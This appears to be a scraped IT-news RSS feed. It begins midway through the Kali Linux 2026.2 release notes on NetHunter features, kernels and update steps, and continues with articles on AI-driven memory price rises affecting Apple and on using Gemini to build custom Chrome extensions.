<img src="https://www.kali.org/blog/kali-linux-2026-2-release/images/nethunter-eviltwin.jpg" alt="Kali NetHunter EvilTwin">
</a>
</p>

<p>We have a tremendous amount of news for the lovers of mobile hacking! The <a href="https://store.nethunter.com/packages/com.offsec.nethunter/">Kali NetHunter app</a> <strong>launches instantly</strong> now, various <strong>bugs have been fixed</strong> with the <a href="https://www.kali.org/docs/nethunter/nethunter-custom-commands/">custom commands</a> and <a href="https://www.kali.org/docs/nethunter/nethunter-chroot-manager/">chroot manager</a> . A <strong>new EvilTwin</strong> (Wi-Fi Fake AP) tab has been added with password verification captive portal, <em>which brought along a really needed iptables fix</em>. So now after using <a href="https://www.kali.org/docs/nethunter/nethunter-wifipumpkin/">Wifipumpkin3</a> or EvilTwin, Android Hotspot will work properly. Huge thanks to the incredible work by <a href="https://gitlab.com/dr1408">@dr.rootsu</a>. The <a href="https://www.kali.org/docs/nethunter/nethunter-kernel/">kernel flasher tab</a> has also <strong>received a refresh</strong>.</p>
<p>However, this release’s spotlight is on the beginning of the <a href="https://www.kali.org/blog/kali-linux-2026-2-release/#the-qcacld30-injection-story">Qcacld-3.0 injection patch</a> wave.</p>
<h3>The Qcacld3.0 Injection Story</h3>
<p>We finally came to a milestone, shout-out to all the developers that worked on injection through the <em>years</em>!</p>
<p><a href="https://gitlab.com/kimocoder">@kimocoder</a> easily spent more than anyone else on this goal. His original injection implementation came to life, on a specific device: the OnePlus Nord (AC2003). You can find the commit <a href="https://github.com/kimocoder/android_kernel_oneplus_avicii/commit/8eb5de1047e7bf069cb4de38c3a35489b35df189">here</a>. Then <a href="https://gitlab.com/Loukious">@Loukious</a> came in the mix and his modifications made it to work on other devices with <a href="https://github.com/Loukious/android_kernel_xiaomi_sm8150/commit/18c57c61ecd8f02de778e36db6be9b41167a8825">this port</a>. Finally, <a href="https://gitlab.com/cyberknight777">@cyberknight777</a> did some housekeeping, removed unnecessary changes, logging, and restored the correct authorship while attributing @Loukious as co-author. The result, <a href="https://github.com/Neternels/android_kernel_xiaomi_sunny/commit/1a4a7d313acc75cfca9a5e97673745d721b6ccea">this patch</a> is the <strong>almost universal</strong> one which brought many devices into the injection world, starting with the ones below for both kernel 4.x and 5.x versions:</p>
<ul>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-oneplus-7/">OnePlus 7</a> (LineageOS 23.2)</li>
<li>OnePlus 9 / 9 Pro</li>
<li>OnePlus Nord</li>
<li>POCO X3 Pro</li>
<li>Redmi Note 10</li>
<li>Samsung A73</li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-xiaomi-mi-a3/">Xiaomi Mi A3</a> (LineageOS 23.2)</li>
<li>Xiaomi Poco X3 NFC (PixelOS Android 16)</li>
<li>Xiaomi Redmi Note 8</li>
</ul>
<h3>Wifite On TV</h3>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-2-release/images/nethunter-wifite2-netflix-bloodhounds-s02e01.jpg" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-2-release/images/nethunter-wifite2-netflix-bloodhounds-s02e01.jpg" alt="Kali Wifite Netflix Bloodhounds S02E01">
</a>
</p>

<p>In the meantime, his continuous work on improving <a href="https://www.kali.org/tools/wifite/">wifite</a> caught some attention - spotted on Netflix twice. Not bad!</p>
<h3>Magisk Standalone Kernel Installer</h3>
<p>The kernel flasher tab <em>(still experimental on some devices)</em> is back in a new shape, giving a hint for the possible future look for the NetHunter app.</p>
<p>The <strong>Magisk standalone kernel flashing support is now here</strong> - you can simply open any newly built kernel installer zip in the Magisk app that was built using the <a href="https://gitlab.com/kalilinux/nethunter/build-scripts/kali-nethunter-installer">kali-nethunter-installer</a>.</p>
<h3>New Kernels</h3>
<p>In addition to the kernels that now support the qcacld3 injection, there are several <a href="https://nethunter.kali.org/kernels.html">new versions and phones</a>:</p>
<ul>
<li>Google Pixel 6a (LineageOS 23.2)</li>
<li>Redmi 5A (crDroid 14)</li>
<li>Samsung Note 20 Ultra (Android 13)</li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-samsung-galaxy-s10/">Samsung S10</a> (LineageOS 23.2)</li>
<li>Samsung S10 5G (LineageOS 23.2)</li>
<li>Samsung S10+ (LineageOS 23.2)</li>
<li>Samsung S10e (LineageOS 23.2)</li>
</ul>
<h3>NetHunter Pro</h3>
<p>Kali bare metal now on more phones! New devices added in build thanks to the awesome work by <a href="https://github.com/taygoth">@Max Furman</a>:</p>
<ul>
<li>Fairphone FP5 (QCM6490) (fp5)</li>
<li>Google Pixel 3 (SDM845) (blueline)</li>
<li>Google Pixel 3a (SDM670) (sargo)</li>
<li>Google Pixel 3a XL SDC panel (SDM670) (bonito-sdc)</li>
<li>Google Pixel 3a XL Tianma panel (SDM670) (bonito-tianma)</li>
<li>Google Pixel 4a (SDM730) (sunfish)</li>
<li>LG G7 ThinQ (SDM845) (judyln)</li>
<li>LG V35 ThinQ (SDM845) (judyp)</li>
<li>Samsung Galaxy S9 China (SDM845) (starqltechn)</li>
<li>SHIFTphone 8 (QCM6490) (otter)</li>
<li>Sony Xperia 10 III (SM6350) (pdx213)</li>
<li>Sony Xperia XZ2 (SDM845) (xperia-tama-apollo)</li>
<li>Sony Xperia XZ2 Compact (SDM845) (xperia-tama-akari)</li>
<li>Sony Xperia XZ2 Premium (SDM845) (xperia-tama-akatsuki)</li>
<li>Xiaomi Mi 10T Lite (SM7225) (toco)</li>
<li>Xiaomi Mi 9 Pro 5G (SM8150) (tucana)</li>
<li>Xiaomi Mi 9T Pro Samsung panel (SM8150) (davinci-samsung)</li>
<li>Xiaomi Mi 9T Pro Visionox panel (SM8150) (davinci-visionox)</li>
<li>Xiaomi Mi Mix 2S (SDM845) (polaris)</li>
<li>Xiaomi Poco X3 Huaxing panel (SM7150) (surya-huaxing)</li>
<li>Xiaomi Poco X3 Tianma panel (SM7150) (surya-tianma)</li>
<li>Xiaomi Redmi Note 10 Pro (SM7150) (sweet)</li>
</ul>
<h3>NetHunter Podcast Episode 3</h3>
<p><a href="https://gitlab.com/yesimxev">@yesimxev</a> and <a href="https://www.linkedin.com/in/kristopher-wilson-208b59123">@Kristopher Wilson</a> joined for a discussion about NetHunter in cars, and leveraging AI for Bug Bounty projects and more.</p>
<div>

</div>
<h2>Kali Website Updates</h2>
<p>Since our last release, Kali 2026.1, we have been keeping the website and documentation up-to-date. Here is a quick summary of what has changed.</p>
<h3>Kali Documentation</h3>
<p>Most of the <a href="https://www.kali.org/docs/">documentation</a> updates this cycle are around NetHunter device support and the new APT sources format. Pages which got something more than a tweak:</p>
<ul>
<li><a href="https://www.kali.org/docs/development/live-build-a-custom-kali-iso/">Creating A Custom Kali ISO</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/troubleshooting/handling-common-apt-errors/">Handling common APT problems</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-samsung-galaxy-s10/">Installing NetHunter on the Samsung Galaxy S10</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-ticwatch-pro-3/">Installing NetHunter on the TicWatch Pro 3</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-ticwatch-pro/">Installing NetHunter on the TicWatch Pro</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-xiaomi-mi-a2/">Installing NetHunter on the Xiaomi Mi A2</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-xiaomi-mi-a3/">Installing NetHunter on the Xiaomi Mi A3</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/">Kali NetHunter</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/general-use/kali-apt-sources/">Kali Network Repositories (/etc/apt/sources.list)</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/introduction/default-credentials/">Kali’s Default Credentials</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/community/submitting-issues-kali-bug-tracker/">Submitting Bugs for Kali Linux</a> <em>(updated)</em></li>
</ul>
<p>We also want to say a little thank you to the following for their work on the sites:</p>
<ul>
<li><a href="https://gitlab.com/chrisjr404">@Chris Southerland Jr</a></li>
<li><a href="https://gitlab.com/mr00k3">@mr00k3</a></li>
<li><a href="https://gitlab.com/Simeon53424">@Simeon_YT</a></li>
<li><a href="https://gitlab.com/V0lk3n">@V0lk3n</a></li>
</ul>
<p>Anyone can help out, anyone can get <a href="https://www.kali.org/docs/community/contribute/">involved</a>!</p>
<h3>New Kali Mirrors</h3>
<p>We welcomed <strong>1 new mirror</strong> during this release cycle, but that’s a significant one: <strong>our first mirror in Africa!</strong> Hoping that many others will follow ;)</p>
<p>The mirror is located in <strong>South Africa</strong>, online at <a href="https://mirror.africloud.com/kali/">mirror.africloud.com</a>. It is sponsored by <a href="https://africloud.com/">AFRICLOUD</a>, and was setup thanks to Oluniyi Ajao.</p>
<p>If you have the disk space and bandwidth, <a href="https://www.kali.org/docs/community/setting-up-a-kali-linux-mirror/">we always welcome new mirrors</a>.</p>
<hr>
<h2>Get Kali Linux 2026.2</h2>
<p><strong>Fresh Images</strong></p>
<p>So what’s stopping you? Go and <a href="https://www.kali.org/get-kali/">get Kali</a> already!</p>
<p>If you cannot wait for the next release, we also produce <strong><a href="https://cdimage.kali.org/kali-images/kali-weekly/">weekly builds</a></strong> which include the latest packages at the time of download, meaning fewer updates needed on first boot. These are automated builds rather than QA’d releases like our standard <a href="https://www.kali.org/releases/">release images</a>, but we still welcome <a href="https://bugs.kali.org/">bug reports</a> on them. The earlier we catch issues, the sooner they get fixed.</p>
<p><strong>Existing Installs</strong></p>
<p>Using Kali already? Great! You can <a href="https://www.kali.org/docs/general-use/updating-kali/">keep it up-to-date</a> by doing:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ sudo tee /etc/apt/sources.list.d/kali.sources &lt;&lt; 'EOF'
Types: deb
URIs: http://http.kali.org/kali/
Suites: kali-rolling
Components: main contrib non-free non-free-firmware
Signed-By: /usr/share/keyrings/kali-archive-keyring.gpg
EOF
[...]
┌──(kali㉿kali)-[~]
└─$ sudo apt update &amp;&amp; sudo apt -y full-upgrade
[...]
┌──(kali㉿kali)-[~]
└─$ cp -vrbi /etc/skel/. ~/
[...]
┌──(kali㉿kali)-[~]
└─$ sudo reboot -f
</code></pre>
<p><em>Remember, we recommend doing <a href="https://www.kali.org/blog/kali-linux-2026-2-release/#disruptive-package-updates">a reboot for this release</a>!</em></p>
<p>You should now be on Kali Linux 2026.2. We can double check this by doing:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ grep VERSION /etc/os-release
VERSION="2026.2"
VERSION_ID="2026.2"
VERSION_CODENAME="kali-rolling"
┌──(kali㉿kali)-[~]
└─$ uname -v
#1 SMP PREEMPT_DYNAMIC Kali 6.19.14-1+kali1 (2026-05-05)
┌──(kali㉿kali)-[~]
└─$ uname -r
6.19.14+kali-amd64
</code></pre>
<p><em>NOTE: The output of <code>uname -r</code> may be different depending on the system <a href="https://pkg.kali.org/pkg/linux">architecture</a>.</em></p>
<hr>
<p>As always, if you run into anything broken, please <a href="https://bugs.kali.org/">report it</a>. <em>We will never be able to fix what we do not know is broken!</em> <strong>And Social networks are not bug trackers!</strong></p>
<hr>
<p>Want to keep up-to-date easier? We’ve got you!</p>
<ul>
<li><a href="https://www.kali.org/blog/">Blog</a>? Use our <a href="https://www.kali.org/rss.xml">RSS feed</a> and <a href="https://www.kali.org/newsletter/">newsletter</a></li>
<li><a href="https://www.kali.org/get-kali/">Download</a>? We have a <a href="https://www.kali.org/torrents.xml">Torrent RSS feed</a></li>
<li><a href="https://www.kali.org/docs/community/list-of-official-kali-sites/#social-media-networks">Socials</a>? <a href="https://bsky.app/profile/kalilinux.bsky.social">Bluesky</a>, <a href="https://www.facebook.com/KaliLinux/">Facebook</a>, <a href="https://www.instagram.com/kalilinux/">Instagram</a>, <a href="https://infosec.exchange/@kalilinux">Mastodon</a> &amp; <a href="https://x.com/kalilinux">X</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s memory problem is your problem, too]]></title>
<description><![CDATA[Apple’s ongoing problems with RAM shortages and higher prices won’t be solved anytime soon, because rapidly accelerating demand for high-end AI memory is devouring the consumer electronics industry. 



GoPro has already warned it might go out of business — and the scale of the crunch has prompte...]]></description>
<link>https://tsecurity.de/de/3633356/it-nachrichten/apples-memory-problem-is-your-problem-too/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633356/it-nachrichten/apples-memory-problem-is-your-problem-too/</guid>
<pubDate>Mon, 29 Jun 2026 17:48:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Apple’s ongoing problems with RAM shortages and higher prices won’t be solved anytime soon, because rapidly accelerating demand for high-end AI memory is devouring the consumer electronics industry. </p>



<p>GoPro has already <a href="https://www.bloomberg.com/news/articles/2026-06-01/gopro-warns-of-going-concern-risk-amid-ai-fueled-memory-crunch" target="_blank" rel="noreferrer noopener">warned it might go out of business</a> — and the scale of the crunch has prompted <a href="https://www.cnbc.com/2026/06/27/memory-crunch-shaking-apple-and-microsoft-existential-for-small-guys.html" target="_blank" rel="noreferrer noopener">analysts to call it</a> an “absolute existential crisis” for smaller tech firms.</p>



<h2 class="wp-block-heading"><strong>An endless night</strong></h2>



<p>The whole issue might get worse. Noted Apple analyst Ming-Chi Kuo believes <a href="https://x.com/mingchikuo/status/2071286087759393104?s=20" data-type="link" data-id="https://x.com/mingchikuo/status/2071286087759393104?s=20" target="_blank" rel="noreferrer noopener">the supply/demand crisis will deepen through 2027</a>. He expects up to 20% of the remaining memory manufacturing capacity currently going to consumer electronics could be diverted to feed data centers in the coming year. That’s a message of doom to smaller firms, and the Android market will be eaten up. </p>



<p>It’s lazy thinking to see Apple as a villain in this scenario. The company might have been charging more for add-on memory than market rates, but there were real technical reasons to do so. And while critics might be castigating Cupertino for those past practices, they’ll still find themselves now paying more for whatever brand of electronic devices they use to write their screeds on in future.</p>



<p>It’s all about supply and demand. Memory manufacturers see the opportunity to feed AI need, even if it means sacrificing consumer markets as they do.</p>



<h2 class="wp-block-heading"><strong>Cash through chaos</strong></h2>



<p>You can argue that the consequences of that decision are unethical. Should memory makers have considered the consequence of curtailed supply on their existing markets? After all, every business, every school, and almost every consumer is now a digital entity, and the massive increase in PC, smartphone, and other consumer electronics prices will have a consequential impact across all layers of society.</p>



<p>It generates yet another inflationary pressure (as if more is needed) on the global economy, and the decision to further limit supply of consumer electronics memory could be seen as corporate irresponsibility. That’s partly why a class action against the big three memory makers (Samsung, SK Hynix, and Micron) <a href="https://en.sedaily.com/international/2026/06/29/samsung-sk-hynix-micron-sued-in-us-over-memory-price-fixing" target="_blank" rel="noreferrer noopener">has been filed in California</a>. Between them, those three firms control around 90% of global memory supply, giving the trio colossal market power.</p>



<p>It’s a real power imbalance. </p>



<h2 class="wp-block-heading"><strong>This is market power</strong></h2>



<p>GoPro is typical; as a smaller vendor, there isn’t much it can do to save itself. Apple has more clout, so it might be able to forge a way forward. But even then, it’s rowing against what CEO Tim Cook has already called “a hundred-year flood.”</p>



<p>So even if the company can convince the Trump Administration to let it secure memory from currently embargoed Chinese manufacturer <a href="https://www.ft.com/content/d72a25e2-7bde-4aa9-bd8d-0c4f3d6cb2cb?syn-25a6b1a6=1" target="_blank" rel="noreferrer noopener">ChangXin Memory Technologies</a>, the move is unlikely to ease the pressure much at all.  “Tim Cook is one of the few tech leaders who can still navigate both Washington and Beijing, so this is better handled before he steps down as CEO,” wrote Ming-Chi Kuo. That’s true, though Cook will continue “engaging with policy makers” once he takes on his new role as executive chairman of Apple’s board of directors in September.</p>



<p>Apple will likely also be speaking with partners to explore the possibility of investing in additional fabrication plants together (or <a href="https://www.applemust.com/apple-broke-for-silicon-memory-could-be-next" target="_blank" rel="noreferrer noopener">building its own</a>, given it has its own stable of experts quite capable of doing so). But even if those talks come to something, it will be years before they enter operation. Sadly, <a href="https://www.ft.com/content/86013b7e-41da-445a-981c-075a701dccf6" target="_blank" rel="noreferrer noopener">manufacturing investment</a> from the existing big memory firms seems focused on data centers.</p>



<h2 class="wp-block-heading"><strong>The shortage will continue until morale improves</strong></h2>



<p>What happens now? Short of any direct intervention to change the situation, memory prices will continue to accelerate. Jefferies Equity Research <a href="https://wccftech.com/jefferies-warns-memory-prices-surge-50-percent-q3-40-in-q4-2026-no-relief-until-2028/" target="_blank" rel="noreferrer noopener">warns they will rise up to 50% in Q3</a> and an additional 30% to 40% by the end of 2026. They’ll also continue to increase next year, by which time some new production capacity might begin to come on stream. </p>



<p>The scale of these price increases means no one can know whether Apple’s most recent product price increases (and the looming iPhone price increases in fall) will cover the full extent of the anticipated memory price hike. </p>



<p>Will we see prices fall if memory price inflation eases off? History says we’re unlikely to see <a href="https://www.bloomberg.com/news/newsletters/2026-06-28/apple-s-sweeping-price-hikes-bring-the-ai-era-home-m6-m7-touch-macbook-pro?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzb3VyY2UiOiJTdWJzY3JpYmVyR2lmdGVkQXJ0aWNsZSIsImlhdCI6MTc4MjY1NTUxOSwiZXhwIjoxNzgzMjYwMzE5LCJhcnRpY2xlSWQiOiJUSENISzFLR0lGUE0wMCIsImJjb25uZWN0SWQiOiJDNEVEQ0FFMUZBMDU0MEJFQTI0QTlGMjExQzFFOTA4MCJ9.aElIOpQpFx1rYhl7QvbJKULJEOjArJj1xiXpPD6W384&amp;leadSource=uverify%20wall" target="_blank" rel="noreferrer noopener">AI-flation</a> go in reverse, but it’s not completely impossible. Meanwhile, businesses everywhere will struggle with unexpected hardware cost increases that are impossible to plan for. You can also anticipate some smaller vendors exiting the market, leaving companies who might have deployed those products across their business exposed, as software updates and hardware repairs will cease.</p>



<h2 class="wp-block-heading"><strong>Yes, AI has already changed the world – it’s more expensive</strong></h2>



<p>They told us AI would change the world. It appears to be doing so by making everything more expensive. </p>



<p>While there will still be opportunity to generate cash through this chaos, it’s far from delivering the kind of stable, business-friendly environment most governments rely on to balance their books.  In the end, all of this calls to mind the <a href="https://en.wikipedia.org/wiki/DRAM_price_fixing_scandal" target="_blank" rel="noreferrer noopener">2002 DRAM price fixing scandal</a>, the only difference being that the consequences are much greater in this digital-everything age. </p>



<p><em>Please join me on social media at </em><em><a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener"><em>BlueSky</em></a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener"><em>LinkedIn</em></a>, or <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener"><em>Mastodon</em></a></em><em>, and do subscribe my daily human-curated </em><em><a href="https://thecorenews.substack.com/"><em>Apple news headline summary on Substack</em></a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Voters Think A.I. Is Terrible. In Campaigns, It’s Everywhere.]]></title>
<description><![CDATA[A.I.-generated images are the public face of this election overhaul. Behind the scenes, campaigns are using the technology to analyze voter data, craft campaign materials and write custom messages.]]></description>
<link>https://tsecurity.de/de/3633121/it-nachrichten/voters-think-ai-is-terrible-in-campaigns-its-everywhere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633121/it-nachrichten/voters-think-ai-is-terrible-in-campaigns-its-everywhere/</guid>
<pubDate>Mon, 29 Jun 2026 16:02:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A.I.-generated images are the public face of this election overhaul. Behind the scenes, campaigns are using the technology to analyze voter data, craft campaign materials and write custom messages.]]></content:encoded>
</item>
<item>
<title><![CDATA[Oh, behave! How Gemini can reshape the web for the way you work]]></title>
<description><![CDATA[Reading about the “revolutionary” nature of generative AI technology these days, it’s hard not to feel a little left out.



Sure, services like Google’s Gemini and its contemporaries can be useful in certain limited, specific areas for productivity purposes. But working with them can also be pre...]]></description>
<link>https://tsecurity.de/de/3632771/it-nachrichten/oh-behave-how-gemini-can-reshape-the-web-for-the-way-you-work/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632771/it-nachrichten/oh-behave-how-gemini-can-reshape-the-web-for-the-way-you-work/</guid>
<pubDate>Mon, 29 Jun 2026 13:47:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Reading about the “revolutionary” nature of generative AI technology these days, it’s hard not to feel a little left out.</p>



<p>Sure, services like Google’s Gemini and its contemporaries <a href="https://www.computerworld.com/article/4007736/gemini-android.html">can be useful</a> in <a href="https://www.computerworld.com/article/3845447/google-workspace-how-to-use-gemini-ai-side-panel.html">certain limited, specific areas</a> for productivity purposes. But working with them can also be pretty disheartening and overwhelming — from <a href="https://www.computerworld.com/article/4047909/burned-out-by-bots-prompt-fatigue-in-workplace.html">prompt fatigue</a> and an onslaught of <a href="https://www.cio.com/article/4077448/ai-workslop-the-new-productivity-killer-only-training-can-stop.html" target="_blank">AI workslop</a> to the fear of <a href="https://www.computerworld.com/article/4175956/the-ai-tech-job-slaughter-gets-real.html">lost jobs</a> and even just the simple <a href="https://www.computerworld.com/article/4059383/openai-admits-ai-hallucinations-are-mathematically-inevitable-not-just-engineering-flaws.html">inconsistencies and inaccuracies</a> these systems are <a href="https://www.computerworld.com/article/4136922/google-gemini-3-years.html">so prone to providing</a>. (And that’s to say nothing of <a href="https://www.computerworld.com/article/4182583/ai-creepy-era.html">the ever-increasing creepy factor</a> that often accompanies this type of technology.)</p>



<p>More and more, it seems the most significant impact of these systems is in <a href="https://www.computerworld.com/article/4022711/when-everything-is-vibing.html">areas like coding</a>, where AI is allowing ambitious tech-heads to <a href="https://www.fastcompany.com/91528164/claude-code-vibe-code-word-processor" target="_blank" rel="noreferrer noopener">create their own custom programs</a> with limited to no programming knowledge (but <a href="https://www.fastcompany.com/91345791/vibecoding-replit-debugging-claude" target="_blank" rel="noreferrer noopener">a <em>lot</em> of time, vision, and patience</a>) — as well as allowing accomplished coders to produce products more quickly by letting AI do the dirty work and then spending <em>their</em> time <a href="https://www.computerworld.com/article/4066260/why-we-need-human-developers.html">guiding, tweaking, and correcting its output</a>.</p>



<p>That’s all well and good, but the reality is that most of us mere mortals are never gonna mess with anything that daunting. That doesn’t, however, mean we can’t enjoy a slice of the custom-coding pie and the productivity advantages it offers — on a much simpler but still supremely useful level.</p>



<p>The average-worker answer lies in an oft-overlooked middle-ground possibility these AI chatbots possess to help us create relatively basic but extremely high-potential custom browser extensions. As their name suggests, these simple little programs run entirely in your browser — the same exact sorts of add-ons you’d typically find and install in a marketplace like <a href="https://chromewebstore.google.com/" target="_blank" rel="noreferrer noopener">Google’s Chrome Web Store</a>.</p>



<p>But with Gemini or any other similar genAI platform, you can dream up your <em>own </em>web-improving extension and turn it into reality in a matter of minutes — simply by describing your goal and then guiding the AI gently along the way. And given how much time most of us spend on the web these days, that opens up a tantalizing series of doors for taking total control of your work environment.</p>



<p>Hate all the extraneous bells and whistles gunking up the Google Docs interface? Gemini can create a Chrome extension that removes them. Annoyed by a glitchy web app? Ask Gemini for an extension that makes some under-the-hood improvements. The possibilities are endless.</p>



<p>Let me show you how exactly it works, how easy it is to approach and master, and how many work-enhancing possibilities are out there just waiting to be created.</p>



<h2 class="wp-block-heading"><a></a>The ins and outs of Gemini’s custom Chrome extensions</h2>



<p>First things first: You don’t need any special tools or subscriptions to make this happen. For the purposes of this article, we’ll focus on Google’s Gemini for the creation and the standard desktop Chrome browser for the installation — but the same basic process would work with most any AI chatbot, if you happen to prefer ChatGPT or Claude, as well as with any extension-supporting, <a href="https://www.computerworld.com/article/1717405/googles-chromium-browser-explained.html">Chromium-compatible browser</a> (a list that includes everything from Microsoft Edge to Brave, <a href="https://www.computerworld.com/article/4148888/8-advanced-ways-vivaldi-boosts-your-productivity.html">Vivaldi</a>, and beyond).</p>



<p>Google offers a dizzying array of <a href="https://blog.google/products-and-platforms/products/google-one/google-ai-subscriptions/" target="_blank" rel="noreferrer noopener">Gemini modes and options</a> and an equally overwhelming series of <a href="https://gemini.google/subscriptions/" target="_blank" rel="noreferrer noopener">AI subscription plans</a> that control how much you can use those capabilities, but you don’t need to worry about any of that to create custom Chrome extensions. You might sometimes see better results if you switch your Gemini model to “Pro” or your Gemini <em>thinking level</em> to “Extended” — designations that even Gemini itself has trouble deciphering (believe me, I asked!) — but just using the default Gemini settings with a free Google account will generally work quite well.</p>



<p>Getting going with a custom Chrome extension is as simple as <a href="https://gemini.google.com/" target="_blank" rel="noreferrer noopener">opening up a new Gemini chat</a> and telling the system what you want it to cook up for you. The hardest part is deciding what you want and what’d be helpful for you — something we’ll explore more in a moment, via specific examples and suggestions. Once you’ve got that, you can just ask Gemini to create a Chrome extension that’ll accomplish what you’re envisioning, with as much specificity as possible about what it’ll do and how it’ll look.</p>



<p>Gemini will spit back a series of plain-text code chunks with instructions to copy each cluster and paste it into a new plain text file with a certain specific name — things like “manifest.json,” “content.js,” and “styles.css.” All you’ll do is use the on-screen button to copy each segment, then open up any simple text editor (like Windows Notepad, macOS TextEdit, or any number of <a href="https://browserpad.org/" target="_blank" rel="noreferrer noopener">simple online text editors</a>) and paste the text in, then save it under the name Gemini gives you.</p>



<p>You’ll need to put all the files into a single isolated folder on your computer, and then you can go into Chrome, type <strong>chrome:extensions </strong>into its address bar, and install your shiny new creation by:</p>



<ul class="wp-block-list">
<li>Flipping the toggle next to “Developer mode” in the upper-right corner of the screen into the on and active position, if it isn’t already</li>



<li>Clicking the “Load unpacked” button</li>



<li>And selecting the folder you just created in the pop-up that appears</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/gemini-custom-chrome-extensions-01-chrome-extension-controls.jpg?quality=50&amp;strip=all&amp;w=1024" alt="chrome extension controls including developer mode toggle and load unpacked button" class="wp-image-4185233" width="1024" height="114" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Chrome’s “Developer Mode” toggle and “Load unpacked” button are the keys to importing any extension you create.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / Foundry</p></div>



<p>And that’s pretty much it: No complicated compiling or program publishing — the extension you envisioned will be alive and working right in your browser and ready to use.</p>



<p>Now, odds are, it won’t be <em>exactly</em> what you wanted in its first iteration, and you’ll have to go back to Gemini to request several rounds of updates and corrections. Each time, Gemini will create a new set of code chunks, and you simply overwrite the text in each file with its corresponding new code chunk.</p>



<p>It’s still a bit of a process. But you’ll rarely spend more than an hour on something simple and maybe a few hours on something especially multifaceted and specific, and whatever you create will then work to your advantage indefinitely from that point onward, on any computer where you install it.</p>



<p>Before we dive into specific slivers of inspiration, let’s just note the hopefully obvious asterisk that this’ll work only if you’re <em>either </em>(a) using a personal computer that isn’t associated with an organization or (b) using a work-connected computer where custom Chrome extensions are permitted. In either scenario, you’ll want to use your own best judgment to ensure that whatever you’re adding into your browser won’t expose any corporate data or cause your IT comrades any alarm if they see you using it in your workday.</p>



<p>With most common examples, though — including all the ones we’re about to go over — you shouldn’t have any problem or cause for concern.</p>



<p>Capisce? Capisce. Let’s get into it.</p>



<h2 class="wp-block-heading"><a></a>Custom extension category #1: The interface fixer</h2>



<p>Our first custom Chrome extension category is the one that won me over to this practice initially and has been the most shapeshifting for my own browser-based workflow — and that’s the simple-seeming but transformational ability to have AI remake any web app you rely on to remove unneeded elements and redesign the interface to <em>your</em> exact specifications.</p>



<p>The best example I can show you is what I did with my completely homemade, Gemini-created Docs Zen extension. Google Docs, to put it mildly, has devolved into <a href="https://www.computerworld.com/article/1723650/google-docs-cheat-sheet-how-to-get-started.html#work">a cluttered mess</a>. There are so many on-screen elements I never use and, ironically enough, irrelevant AI elements I’d rather not have in my hair. I just want a calm, simple, minimalist environment for writing — with Google’s second-to-none syncing, universal access, and collaboration systems beneath it.</p>



<p>So rather than try to reinvent the wheel, I described to Gemini all the elements I wanted to remove from Docs and all the ways I wanted to rethink how its interface appeared for me.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/gemini-custom-chrome-extensions-02-initial-prompt.jpg?quality=50&amp;strip=all" alt="prompt asking gemini to make a chrome extension called docs fixer that minimizes and simplifies the google docs interface" class="wp-image-4185238" width="1007" height="621" sizes="auto, (max-width: 1007px) 100vw, 1007px"><figcaption class="wp-element-caption"><p>My original request to Gemini, followed by rounds of expansions and revisions (and eventually also a more poetic name).</p>
</figcaption></figure><p class="imageCredit">JR Raphael / Foundry</p></div>



<p>I went back and forth with numerous iterations and kept coming up with interesting new additions to further flesh out and improve the experience — and I ended up with a delightful setup that gives me a distraction-free view of my writing space with a simple toggle to reveal the main Docs menus and a palette icon that allows me to switch from one eye-pleasing theme to another.</p>


